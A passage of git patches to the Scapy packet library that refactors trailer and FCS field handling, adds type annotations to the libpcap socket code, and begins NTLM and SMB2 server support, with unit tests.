_FieldContainer(object): """ A field that acts as a container for another field """ + def __getattr__(self, attr): # type: (str) -> Any return getattr(self.fld, attr) @@ -643,17 +646,51 @@ def addfield(self, ), self._padwith) + sval -class FCSField(Field[int, int]): +class TrailerBytes(bytes): + """ + Reverses slice operations to take from the back of the packet, + not the front + """ + + def __getitem__(self, item): # type: ignore + # type: (Union[int, slice]) -> Union[int, bytes] + if isinstance(item, int): + if item < 0: + item = 1 + item + else: + item = len(self) - 1 - item + elif isinstance(item, slice): + start, stop, step = item.start, item.stop, item.step + new_start = -stop if stop else None + new_stop = -start if start else None + item = slice(new_start, new_stop, step) + return super(self.__class__, self).__getitem__(item) + + if six.PY2: + def __getslice__(self, i, j): + # Python 2 compat + return self.__getitem__(slice(i, j)) + + +class TrailerField(_FieldContainer): """Special Field that gets its value from the end of the *packet* (Note: not layer, but packet). Mostly used for FCS """ + __slots__ = ["fld"] + + def __init__(self, fld): + # type: (Field[Any, Any]) -> None + self.fld = fld + + # Note: this is ugly. Very ugly. + # Do not copy this crap elsewhere, so that if one day we get + # brave enough to refactor it, it'll be easier. def getfield(self, pkt, s): # type: (Packet, bytes) -> Tuple[bytes, int] previous_post_dissect = pkt.post_dissect - val = self.m2i(pkt, struct.unpack(self.fmt, s[-self.sz:])[0]) def _post_dissect(self, s): # type: (Packet, bytes) -> bytes @@ -662,12 +699,14 @@ def _post_dissect(self, s): self.post_dissect = previous_post_dissect # type: ignore return previous_post_dissect(s) pkt.post_dissect = MethodType(_post_dissect, pkt) # type: ignore - return s[:-self.sz], val + s = TrailerBytes(s) + s, val = self.fld.getfield(pkt, s) + return bytes(s), val def addfield(self, pkt, s, val): # type: (Packet, bytes, Optional[int]) -> bytes previous_post_build = pkt.post_build - value = struct.pack(self.fmt, self.i2m(pkt, val)) + value = self.fld.addfield(pkt, b"", val) def _post_build(self, p, pay): # type: (Packet, bytes, bytes) -> bytes @@ -677,6 +716,16 @@ def _post_build(self, p, pay): pkt.post_build = MethodType(_post_build, pkt) # type: ignore return s + +class FCSField(TrailerField): + """ + A FCS field that gets appended at the end of the *packet* (not layer). + """ + + def __init__(self, *args, **kwargs): + # type: (*Any, **Any) -> None + super(FCSField, self).__init__(Field(*args, **kwargs)) + def i2repr(self, pkt, x): # type: (Optional[Packet], int) -> str return lhex(self.i2h(pkt, x)) @@ -3432,6 +3481,7 @@ class BitScalingField(_ScalingField, BitField): # type: ignore """ A ScalingField that is a BitField """ + def __init__(self, name, default, size, *args, **kwargs): # type: (str, int, int, *Any, **Any) -> None _ScalingField.__init__(self, name, default, *args, **kwargs) @@ -3442,6 +3492,7 @@ class OUIField(X3BytesField): """ A field designed to carry a OUI (3 bytes) """ + def i2repr(self, pkt, val): # type: (Optional[Packet], int) -> str by_val = struct.pack("!I", val or 0)[1:] diff --git a/test/contrib/metawatch.uts b/test/contrib/metawatch.uts new file mode 100644 index 00000000000..2793a35dbab --- /dev/null +++ b/test/contrib/metawatch.uts @@ -0,0 +1,19 @@ +# Arista Metawatch unit tests +# +# Type the following command to launch start the tests: +# $ test/run_tests -P "load_contrib('metawatch')" -t test/contrib/metawatch.uts + ++ Metawatch + += MetawatchEther, basic instantiation + +m = MetawatchEther() +assert m.type == 0x9000 + += MetawatchEther, build & dissect + +r = raw(MetawatchEther(dst="00:01:02:03:04:05", src="06:07:08:09:10:11")) +assert r == b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\x10\x11\x90\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + +m = MetawatchEther(r) +assert m.dst == "00:01:02:03:04:05" and m.src == "06:07:08:09:10:11" and m.type == 0x9000 diff --git a/test/fields.uts b/test/fields.uts index 1e39df83eda..729a7d9ea8e 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -2089,6 +2089,32 @@ pkt = TestPacket(raw(pkt)) assert pkt.fcs == 0xbeef += FCSField: multiple + +class TestPacket2(Packet): + fields_desc = [ + ByteField("a", 0), + LEShortField("b", 15), + FCSField("fcs1", None), + LEIntField("c", 7), + FCSField("fcs2", None), + IntField("bottom", 0), + ] + +bind_layers(TestPacket2, Ether) + +pkt = TestPacket2(a=12, fcs1=0xbeef, fcs2=0xfeed, bottom=123)/Ether(src="aa:aa:aa:aa:aa:aa", dst="bb:bb:bb:bb:bb:bb")/IP(src="127.0.0.1", dst="127.0.0.1") + +assert raw(pkt) == b'\x0c\x0f\x00\x07\x00\x00\x00\x00\x00\x00{\xbb\xbb\xbb\xbb\xbb\xbb\xaa\xaa\xaa\xaa\xaa\xaa\x08\x00E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01\xfe\xed\xbe\xef' +assert raw(pkt) == b'\x0c\x0f\x00\x07\x00\x00\x00\x00\x00\x00{\xbb\xbb\xbb\xbb\xbb\xbb\xaa\xaa\xaa\xaa\xaa\xaa\x08\x00E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01\xfe\xed\xbe\xef' + +pkt = TestPacket2(raw(pkt)) +assert pkt.fcs1 == 0xbeef +assert pkt.fcs2 == 0xfeed +assert pkt.bottom == 123 +assert pkt.a == 12 + + ############ ############ + PacketField From c0e6663685eb20b2f5a4edc9928d09efdf361021 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 24 Jun 2022 14:56:25 +0200 Subject: [PATCH 0826/1632] Core typing: arch/libpcap.py (#3612) --- .config/mypy/mypy_enabled.txt | 1 + scapy/arch/libpcap.py | 230 +++++++++++++++++++++++----------- scapy/config.py | 18 ++- scapy/libs/winpcapy.py | 10 +- scapy/supersocket.py | 20 +-- tox.ini | 2 +- 6 files changed, 196 insertions(+), 85 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index bac92bfa35a..b1cdbc03923 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -11,6 +11,7 @@ scapy/all.py scapy/ansmachine.py scapy/arch/__init__.py scapy/arch/common.py +scapy/arch/libpcap.py scapy/arch/linux.py scapy/arch/unix.py scapy/arch/solaris.py diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 0d92143829c..3b1e0fe0061 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -24,20 +24,35 @@ log_runtime, warning, ) -from scapy.interfaces import network_name, InterfaceProvider, NetworkInterface +from scapy.interfaces import ( + InterfaceProvider, + NetworkInterface, + _GlobInterfaceType, + network_name, +) +from scapy.packet import Packet from scapy.pton_ntop import inet_ntop from scapy.supersocket import SuperSocket from scapy.utils import str2mac import scapy.consts +from scapy.compat import ( + Dict, + List, + NoReturn, + Optional, + Tuple, + Type, +) + if not scapy.consts.WINDOWS: from fcntl import ioctl # AF_LINK is only available and provided on BSD (MAC) # but because we use its value elsewhere, let's patch it. if not hasattr(socket, "AF_LINK"): - socket.AF_LINK = 18 + socket.AF_LINK = 18 # type: ignore ############ # COMMON # @@ -61,39 +76,58 @@ class _L2libpcapSocket(SuperSocket): - def __init__(self): - self.cls = None + __slots__ = ["pcap_fd"] + + def __init__(self, fd): + # type: (_PcapWrapper_libpcap) -> None + self.pcap_fd = fd + ll = self.pcap_fd.datalink() + if ll in conf.l2types: + self.cls = conf.l2types[ll] + else: + self.cls = conf.default_l2 + warning( + "Unable to guess datalink type " + "(interface=%s linktype=%i). Using %s", + self.iface, ll, self.cls.name + ) def recv_raw(self, x=MTU): - """Receives a packet, then returns a tuple containing (cls, pkt_data, time)""" # noqa: E501 - if self.cls is None: - ll = self.ins.datalink() - if ll in conf.l2types: - self.cls = conf.l2types[ll] - else: - self.cls = conf.default_l2 - warning( - "Unable to guess datalink type " - "(interface=%s linktype=%i). Using %s", - self.iface, ll, self.cls.name - ) - - ts, pkt = self.ins.next() + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 + """ + Receives a packet, then returns a tuple containing + (cls, pkt_data, time) + """ + ts, pkt = self.pcap_fd.next() if pkt is None: return None, None, None return self.cls, pkt, ts - def nonblock_recv(self): + def nonblock_recv(self, x=MTU): + # type: (int) -> Optional[Packet] """Receives and dissect a packet in non-blocking mode.""" - self.ins.setnonblock(1) - p = self.recv(MTU) - self.ins.setnonblock(0) + self.pcap_fd.setnonblock(True) + p = self.recv(x) + self.pcap_fd.setnonblock(False) return p + def fileno(self): + # type: () -> int + return self.pcap_fd.fileno() + @staticmethod def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] return select_objects(sockets, remain) + def close(self): + # type: () -> None + if self.closed: + return + self.closed = True + self.pcap_fd.close() + + ########## # PCAP # ########## @@ -124,14 +158,19 @@ def select(sockets, remain=None): pcap_next_ex, pcap_open_live, pcap_pkthdr, - pcap_sendpacket, pcap_setfilter, pcap_setnonblock, sockaddr_in, sockaddr_in6, ) + try: + from scapy.libs.winpcapy import pcap_inject + except ImportError: + # Fallback for Winpcap... (for how long?) + from scapy.libs.winpcapy import pcap_sendpacket as pcap_inject def load_winpcapy(): + # type: () -> None """This functions calls libpcap ``pcap_findalldevs`` function, and extracts and parse all the data scapy will need to build the Interface List. @@ -163,23 +202,22 @@ def load_winpcapy(): ap = a.contents.addr if family == socket.AF_INET: val = cast(ap, POINTER(sockaddr_in)) - val = val.contents.sin_addr[:] + addr_raw = val.contents.sin_addr[:] elif family == socket.AF_INET6: val = cast(ap, POINTER(sockaddr_in6)) - val = val.contents.sin6_addr[:] + addr_raw = val.contents.sin6_addr[:] elif family == socket.AF_LINK: # Special case: MAC # (AF_LINK is mostly BSD specific) val = ap.contents.sa_data - val = val[:6] - mac = str2mac(bytes(bytearray(val))) + mac = str2mac(bytes(bytearray(val[:6]))) a = a.contents.next continue else: # Unknown AF a = a.contents.next continue - addr = inet_ntop(family, bytes(bytearray(val))) + addr = inet_ntop(family, bytes(bytearray(addr_raw))) if addr != "0.0.0.0": ips.append(addr) a = a.contents.next @@ -224,11 +262,19 @@ def load_winpcapy(): class _PcapWrapper_libpcap: # noqa: F811 """Wrapper for the libpcap calls""" - def __init__(self, device, snaplen, promisc, to_ms, monitor=None): - device = network_name(device) + def __init__(self, + device, # type: _GlobInterfaceType + snaplen, # type: int + promisc, # type: bool + to_ms, # type: int + monitor=None, # type: Optional[bool] + ): + # type: (...) -> None self.errbuf = create_string_buffer(PCAP_ERRBUF_SIZE) - self.iface = create_string_buffer(device.encode("utf8")) - self.dtl = None + self.iface = create_string_buffer( + network_name(device).encode("utf8") + ) + self.dtl = -1 if monitor: if WINDOWS and not conf.use_npcap: raise OSError("On Windows, this feature requires NPcap !") @@ -262,6 +308,7 @@ def __init__(self, device, snaplen, promisc, to_ms, monitor=None): self.bpf_program = bpf_program() def next(self): + # type: () -> Tuple[Optional[float], Optional[bytes]] """ Returns the next packet as the tuple (timestamp, raw_packet) @@ -273,25 +320,33 @@ def next(self): ) if not c > 0: return None, None - ts = self.header.contents.ts.tv_sec + float(self.header.contents.ts.tv_usec) / 1e6 # noqa: E501 - pkt = bytes(bytearray(self.pkt_data[:self.header.contents.len])) + ts = ( + self.header.contents.ts.tv_sec + + float(self.header.contents.ts.tv_usec) / 1e6 + ) + pkt = bytes(bytearray( + self.pkt_data[:self.header.contents.len] # type: ignore + )) return ts, pkt __next__ = next def datalink(self): + # type: () -> int """Wrapper around pcap_datalink""" - if self.dtl is None: + if self.dtl == -1: self.dtl = pcap_datalink(self.pcap) return self.dtl def fileno(self): + # type: () -> int if WINDOWS: return pcap_getevent(self.pcap) else: # This does not exist under Windows - return pcap_get_selectable_fd(self.pcap) + return pcap_get_selectable_fd(self.pcap) # type: ignore def setfilter(self, f): + # type: (str) -> bool filter_exp = create_string_buffer(f.encode("utf8")) if pcap_compile(self.pcap, byref(self.bpf_program), filter_exp, 1, -1) == -1: # noqa: E501 log_runtime.error("Could not compile filter expression %s", f) @@ -303,12 +358,15 @@ def setfilter(self, f): return True def setnonblock(self, i): + # type: (bool) -> None pcap_setnonblock(self.pcap, i, self.errbuf) def send(self, x): - pcap_sendpacket(self.pcap, x, len(x)) + # type: (bytes) -> int + return pcap_inject(self.pcap, x, len(x)) # type: ignore def close(self): + # type: () -> None pcap_close(self.pcap) open_pcap = _PcapWrapper_libpcap @@ -320,6 +378,7 @@ class LibpcapProvider(InterfaceProvider): libpcap = True def load(self): + # type: () -> Dict[str, NetworkInterface] if not conf.use_pcap or WINDOWS: return {} if not conf.cache_pcapiflist: @@ -349,6 +408,7 @@ def load(self): return data def reload(self): + # type: () -> Dict[str, NetworkInterface] if conf.use_pcap: from scapy.arch.libpcap import load_winpcapy load_winpcapy() @@ -362,20 +422,34 @@ def reload(self): class L2pcapListenSocket(_L2libpcapSocket): desc = "read packets at layer 2 using libpcap" - def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, monitor=None): # noqa: E501 - super(L2pcapListenSocket, self).__init__() + def __init__(self, + iface=None, # type: Optional[_GlobInterfaceType] + type=ETH_P_ALL, # type: int + promisc=None, # type: Optional[bool] + filter=None, # type: Optional[str] + monitor=None, # type: Optional[bool] + ): + # type: (...) -> None self.type = type self.outs = None - self.iface = iface if iface is None: iface = conf.iface - if promisc is None: - promisc = conf.sniff_promisc - self.promisc = promisc - self.ins = open_pcap(iface, MTU, self.promisc, 100, - monitor=monitor) + self.iface = iface + if promisc is not None: + self.promisc = promisc + else: + self.promisc = conf.sniff_promisc + fd = open_pcap( + iface, MTU, self.promisc, 100, + monitor=monitor + ) + super(L2pcapListenSocket, self).__init__(fd) try: - ioctl(self.ins.fileno(), BIOCIMMEDIATE, struct.pack("I", 1)) + ioctl( + self.pcap_fd.fileno(), + BIOCIMMEDIATE, + struct.pack("I", 1) + ) except Exception: pass if type == ETH_P_ALL: # Do not apply any filter if Ethernet type is given # noqa: E501 @@ -385,32 +459,47 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, monito else: filter = "not (%s)" % conf.except_filter if filter: - self.ins.setfilter(filter) + self.pcap_fd.setfilter(filter) def send(self, x): - raise Scapy_Exception("Can't send anything with L2pcapListenSocket") # noqa: E501 + # type: (int) -> NoReturn + raise Scapy_Exception( + "Can't send anything with L2pcapListenSocket" + ) class L2pcapSocket(_L2libpcapSocket): desc = "read/write packets at layer 2 using only libpcap" - def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, nofilter=0, # noqa: E501 - monitor=None): - super(L2pcapSocket, self).__init__() + def __init__(self, + iface=None, # type: Optional[_GlobInterfaceType] + type=ETH_P_ALL, # type: int + promisc=None, # type: Optional[bool] + filter=None, # type: Optional[str] + nofilter=0, # type: int + monitor=None # type: Optional[bool] + ): + # type: (...) -> None if iface is None: iface = conf.iface self.iface = iface - if promisc is None: - promisc = 0 - self.promisc = promisc - self.ins = open_pcap(iface, MTU, self.promisc, 100, - monitor=monitor) - self.outs = self.ins + if promisc is not None: + self.promisc = promisc + else: + self.promisc = conf.sniff_promisc + fd = open_pcap(iface, MTU, self.promisc, 100, + monitor=monitor) + super(L2pcapSocket, self).__init__(fd) try: - ioctl(self.ins.fileno(), BIOCIMMEDIATE, struct.pack("I", 1)) + ioctl( + self.pcap_fd.fileno(), + BIOCIMMEDIATE, + struct.pack("I", 1) + ) except Exception: pass if nofilter: - if type != ETH_P_ALL: # PF_PACKET stuff. Need to emulate this for pcap # noqa: E501 + if type != ETH_P_ALL: + # PF_PACKET stuff. Need to emulate this for pcap filter = "ether proto %i" % type else: filter = None @@ -420,26 +509,29 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, nofilt filter = "(%s) and not (%s)" % (filter, conf.except_filter) # noqa: E501 else: filter = "not (%s)" % conf.except_filter - if type != ETH_P_ALL: # PF_PACKET stuff. Need to emulate this for pcap # noqa: E501 + if type != ETH_P_ALL: + # PF_PACKET stuff. Need to emulate this for pcap if filter: filter = "(ether proto %i) and (%s)" % (type, filter) else: filter = "ether proto %i" % type if filter: - self.ins.setfilter(filter) + self.pcap_fd.setfilter(filter) def send(self, x): + # type: (Packet) -> int sx = raw(x) try: x.sent_time = time.time() except AttributeError: pass - self.outs.send(sx) + return self.pcap_fd.send(sx) class L3pcapSocket(L2pcapSocket): desc = "read/write packets at layer 3 using only libpcap" def recv(self, x=MTU): + # type: (int) -> Optional[Packet] r = L2pcapSocket.recv(self, x) if r: r.payload.time = r.time @@ -447,19 +539,15 @@ def recv(self, x=MTU): return r def send(self, x): - # Makes send detects when it should add Loopback(), Dot11... instead of Ether() # noqa: E501 - ll = self.ins.datalink() - if ll in conf.l2types: - cls = conf.l2types[ll] - else: - cls = conf.default_l2 - warning("Unable to guess datalink type (interface=%s linktype=%i). Using %s", self.iface, ll, cls.name) # noqa: E501 - sx = raw(cls() / x) + # type: (Packet) -> int + # Makes send detects when it should add + # Loopback(), Dot11... instead of Ether() + sx = raw(self.cls() / x) try: x.sent_time = time.time() except AttributeError: pass - self.outs.send(sx) + return self.pcap_fd.send(sx) else: # No libpcap installed if WINDOWS: diff --git a/scapy/config.py b/scapy/config.py index 225dbca0542..2e1d7a84689 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -38,9 +38,10 @@ NoReturn, Optional, Set, - Type, Tuple, + Type, Union, + overload, TYPE_CHECKING, ) from types import ModuleType @@ -211,7 +212,17 @@ def register_layer2num(self, num, layer): # type: (int, Type[Packet]) -> None self.layer2num[layer] = num + @overload def __getitem__(self, item): + # type: (Type[Packet]) -> int + pass + + @overload + def __getitem__(self, item): # noqa: F811 + # type: (int) -> Type[Packet] + pass + + def __getitem__(self, item): # noqa: F811 # type: (Union[int, Type[Packet]]) -> Union[int, Type[Packet]] if isinstance(item, int): return self.num2layer[item] @@ -728,7 +739,8 @@ class Conf(ConfClass): #: default mode for listening socket (to get answers if you #: spoof on a lan) promisc = True - sniff_promisc = 1 #: default mode for sniff() + #: default mode for sniff() + sniff_promisc = True # type: bool raw_layer = None # type: Type[Packet] raw_summary = False # type: Union[bool, Callable[[bytes], Any]] padding_layer = None # type: Type[Packet] @@ -764,7 +776,7 @@ class Conf(ConfClass): #: holds the Scapy interface list and manager ifaces = None # type: 'scapy.interfaces.NetworkInterfaceDict' #: holds the cache of interfaces loaded from Libpcap - cache_pcapiflist = {} # type: Dict[str, Tuple[str, List[str], int]] + cache_pcapiflist = {} # type: Dict[str, Tuple[str, List[str], Any, str]] neighbor = None # type: 'scapy.layers.l2.Neighbor' # `neighbor` will be filed by scapy.layers.l2 #: holds the Scapy IPv4 routing table and provides methods to diff --git a/scapy/libs/winpcapy.py b/scapy/libs/winpcapy.py index b6ae5aa96ff..75e92ae0383 100644 --- a/scapy/libs/winpcapy.py +++ b/scapy/libs/winpcapy.py @@ -329,6 +329,12 @@ class pcap_if(Structure): pcap_activate = _lib.pcap_activate pcap_activate.restype = c_int pcap_activate.argtypes = [POINTER(pcap_t)] + + # int pcap_inject (pcap_t *p, u_char *buf, int size) + # Send a raw packet. + pcap_inject = _lib.pcap_inject + pcap_inject.restype = c_int + pcap_inject.argtypes = [POINTER(pcap_t), c_void_p, c_int] except AttributeError: pass @@ -425,10 +431,10 @@ class pcap_if(Structure): pcap_breakloop.argtypes = [POINTER(pcap_t)] # int pcap_sendpacket (pcap_t *p, u_char *buf, int size) -# Send a raw packet. +# Send a raw packet, but it returns 0 on success, +# rather than returning the number of bytes written. pcap_sendpacket = _lib.pcap_sendpacket pcap_sendpacket.restype = c_int -# pcap_sendpacket.argtypes = [POINTER(pcap_t), POINTER(u_char), c_int] pcap_sendpacket.argtypes = [POINTER(pcap_t), c_void_p, c_int] # void pcap_dump (u_char *user, const struct pcap_pkthdr *h, const u_char *sp) diff --git a/scapy/supersocket.py b/scapy/supersocket.py index a008482a984..0b037c72060 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -95,8 +95,8 @@ def __init__(self, # type: (...) -> None self.ins = socket.socket(family, type, proto) # type: socket.socket self.outs = self.ins # type: Optional[socket.socket] - self.promisc = None - self.iface = iface + self.promisc = conf.sniff_promisc + self.iface = iface or conf.iface def send(self, x): # type: (Packet) -> int @@ -203,10 +203,10 @@ def close(self): self.closed = True if getattr(self, "outs", None): if getattr(self, "ins", None) != self.outs: - if self.outs and (WINDOWS or self.outs.fileno() != -1): + if self.outs and self.outs.fileno() != -1: self.outs.close() if getattr(self, "ins", None): - if WINDOWS or self.ins.fileno() != -1: + if self.ins.fileno() != -1: self.ins.close() def sr(self, *args, **kargs): @@ -297,10 +297,12 @@ def __init__(self, self.outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 self.outs.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1) self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 - self.iface = iface if iface is not None: iface = network_name(iface) + self.iface = iface self.ins.bind((iface, type)) + else: + self.iface = "any" if not six.PY2: try: # Receive Auxiliary Data (VLAN tags) @@ -455,7 +457,7 @@ class L2ListenTcpdump(SuperSocket): def __init__(self, iface=None, # type: Optional[_GlobInterfaceType] - promisc=False, # type: bool + promisc=None, # type: Optional[bool] filter=None, # type: Optional[str] nofilter=False, # type: bool prog=None, # type: Optional[str] @@ -465,9 +467,11 @@ def __init__(self, # type: (...) -> None self.outs = None args = ['-w', '-', '-s', '65535'] + self.iface = "any" if iface is None and (WINDOWS or DARWIN): - iface = conf.iface - self.iface = iface + self.iface = iface = conf.iface + if promisc is None: + promisc = conf.sniff_promisc if iface is not None: args.extend(['-i', network_name(iface)]) if not promisc: diff --git a/tox.ini b/tox.ini index 1e2107daaa5..67b4e07a72d 100644 --- a/tox.ini +++ b/tox.ini @@ -4,7 +4,7 @@ [tox] envlist = py{27,34,35,36,37,38,39,310,py27,py39}-{linux,bsd}_{non_root,root}, - py{27,34,25,36,37,38,39,310,py27,py39}-windows, + py{27,34,35,36,37,38,39,310,py27,py39}-windows, skip_missing_interpreters = true minversion = 2.9 From 787c62c0c5433d715782940068e454827fb0c0ff Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 24 Jun 2022 17:24:57 +0200 Subject: [PATCH 0827/1632] Fix count parameter for enumerator (#3660) --- scapy/contrib/automotive/scanner/enumerator.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 7c579fcb072..232b8b7a398 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -54,6 +54,7 @@ class ServiceEnumerator(AutomotiveTestCase): _supported_kwargs = copy.copy(AutomotiveTestCase._supported_kwargs) _supported_kwargs.update({ 'timeout': (int, float), + 'count': int, 'execution_time': int, 'state_allow_list': (list, EcuState), 'state_block_list': (list, EcuState), From e457fd161ea8111d7d7c08625e333d0f12ee51cc Mon Sep 17 00:00:00 2001 From: _Frky <3105926+Frky@users.noreply.github.com> Date: Fri, 24 Jun 2022 17:33:50 +0200 Subject: [PATCH 0828/1632] SMB Server Standalone (#3602) * Fix NTLM Server to be able to run in standalone (no relay) * Fix SMB Server to be able to run in standalone (no relay) * SMB2 signing * Continue SMB2 spec & automaton Co-authored-by: gpotter2 --- scapy/fields.py | 25 +- scapy/layers/gssapi.py | 4 + scapy/layers/ntlm.py | 350 ++++++++++++--- scapy/layers/smb.py | 373 ++++++++++++---- scapy/layers/smb2.py | 759 ++++++++++++++++++++++++++++++-- scapy/layers/tls/crypto/hash.py | 7 +- test/scapy/layers/smb2.uts | 25 +- 7 files changed, 1359 insertions(+), 184 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 945cea6c736..f3f084aa5af 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1885,36 +1885,27 @@ def randval(self): return RandBin(RandNum(0, self.max_length or 1200)) -class XStrField(StrField): - """ - StrField which value is printed as hexadecimal. - """ - +class _XStrField(Field[bytes, bytes]): def i2repr(self, pkt, x): # type: (Optional[Packet], bytes) -> str if isinstance(x, bytes): return bytes_hex(x).decode() - return super(XStrField, self).i2repr(pkt, x) + return super(_XStrField, self).i2repr(pkt, x) -class _XStrLenField: - def i2repr(self, pkt, x): - # type: (Optional[Packet], bytes) -> str - if isinstance(x, bytes): - return bytes_hex( - x[:(self.length_from or (lambda x: 0))(pkt)] # type: ignore - ).decode() - # cannot use super() since _XStrLenField does not inherit from Field - return Field.i2repr(self, pkt, x) +class XStrField(_XStrField, StrField): + """ + StrField which value is printed as hexadecimal. + """ -class XStrLenField(_XStrLenField, StrLenField): +class XStrLenField(_XStrField, StrLenField): """ StrLenField which value is printed as hexadecimal. """ -class XStrFixedLenField(_XStrLenField, StrFixedLenField): +class XStrFixedLenField(_XStrField, StrFixedLenField): """ StrFixedLenField which value is printed as hexadecimal. """ diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index 11a51614fef..276416e6fa9 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -437,4 +437,8 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): # the session what to use here. For now: hardcode SPNEGO # (THIS IS A VERY STRONG ASSUMPTION) return SPNEGO_negToken + if _pkt[:7] == b"NTLMSSP": + # XXX: if no mechTypes are provided during SPNEGO exchange, + # Windows falls back to a plain NTLM_Header. + return NTLM_Header.dispatch_hook(_pkt=_pkt, *args, **kargs) return cls diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 9edafcf4e3e..6e94d319f90 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -64,6 +64,15 @@ Optional, ) +# Crypto imports + +from scapy.layers.tls.crypto.hash import Hash_MD4 + +if conf.crypto_valid: + from cryptography.hazmat.primitives import hashes, hmac +else: + hashes = hmac = None + ########## # Fields # ########## @@ -163,6 +172,48 @@ def getfield(self, pkt, s): return s[len_pkt:], self.m2i(pkt, s[:len_pkt]) +class _NTLMPayloadPacket(Packet): + _NTLM_PAYLOAD_FIELD_NAME = "Payload" + + def __getattr__(self, attr): + # Ease compatibility with _NTLMPayloadField + try: + return super(_NTLMPayloadPacket, self).__getattr__(attr) + except AttributeError: + try: + return next( + x[1] + for x in super(_NTLMPayloadPacket, self).__getattr__( + self._NTLM_PAYLOAD_FIELD_NAME + ) + if x[0] == attr + ) + except StopIteration: + raise AttributeError(attr) + + def setfieldval(self, attr, val): + # Ease compatibility with _NTLMPayloadField + try: + return super(_NTLMPayloadPacket, self).setfieldval(attr, val) + except AttributeError: + Payload = super(_NTLMPayloadPacket, self).__getattr__( + self.self._NTLM_PAYLOAD_FIELD_NAME + ) + Payload.pop(next( + i + for i, x in enumerate( + super(_NTLMPayloadPacket, self).__getattr__( + self.self._NTLM_PAYLOAD_FIELD_NAME + )) + if x[0] == attr + )) + Payload.append([attr, val]) + super(_NTLMPayloadPacket, self).setfieldval( + self.self._NTLM_PAYLOAD_FIELD_NAME, + Payload + ) + + def _NTLM_post_build(self, p, pay_offset, fields): # type: (Packet, bytes, int, Dict[str, Tuple[str, int]]) -> bytes """Util function to build the offset and populate the lengths""" @@ -218,38 +269,38 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): # Sect 2.2.2.5 _negotiateFlags = [ - "A", # NTLMSSP_NEGOTIATE_UNICODE - "B", # NTLM_NEGOTIATE_OEM - "C", # NTLMSSP_REQUEST_TARGET + "NTLMSSP_NEGOTIATE_UNICODE", # A + "NTLM_NEGOTIATE_OEM", # B + "NTLMSSP_REQUEST_TARGET", # C "r10", - "D", # NTLMSSP_NEGOTIATE_SIGN - "E", # NTLMSSP_NEGOTIATE_SEAL - "F", # NTLMSSP_NEGOTIATE_DATAGRAM - "G", # NTLMSSP_NEGOTIATE_LM_KEY + "NTLMSSP_NEGOTIATE_SIGN", # D + "NTLMSSP_NEGOTIATE_SEAL", # E + "NTLMSSP_NEGOTIATE_DATAGRAM", # F + "NTLMSSP_NEGOTIATE_LM_KEY", # G "r9", - "H", # NTLMSSP_NEGOTIATE_NTLM + "NTLMSSP_NEGOTIATE_NTLM", # H "r8", "J", - "K", # NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED - "L", # NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED + "NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED", # K + "NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED", # L "r7", - "M", # NTLMSSP_NEGOTIATE_ALWAYS_SIGN - "N", # NTLMSSP_TARGET_TYPE_DOMAIN - "O", # NTLMSSP_TARGET_TYPE_SERVER + "NTLMSSP_NEGOTIATE_ALWAYS_SIGN", # M + "NTLMSSP_TARGET_TYPE_DOMAIN", # N + "NTLMSSP_TARGET_TYPE_SERVER", # O "r6", - "P", # NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY - "Q", # NTLMSSP_NEGOTIATE_IDENTIFY + "NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY", # P + "NTLMSSP_NEGOTIATE_IDENTIFY", # Q "r5", - "R", # NTLMSSP_REQUEST_NON_NT_SESSION_KEY - "S", # NTLMSSP_NEGOTIATE_TARGET_INFO + "NTLMSSP_REQUEST_NON_NT_SESSION_KEY", # R + "NTLMSSP_NEGOTIATE_TARGET_INFO", # S "r4", - "T", # NTLMSSP_NEGOTIATE_VERSION + "NTLMSSP_NEGOTIATE_VERSION", # T "r3", "r2", "r1", - "U", # NTLMSSP_NEGOTIATE_128 - "V", # NTLMSSP_NEGOTIATE_KEY_EXCH - "W", # NTLMSSP_NEGOTIATE_56 + 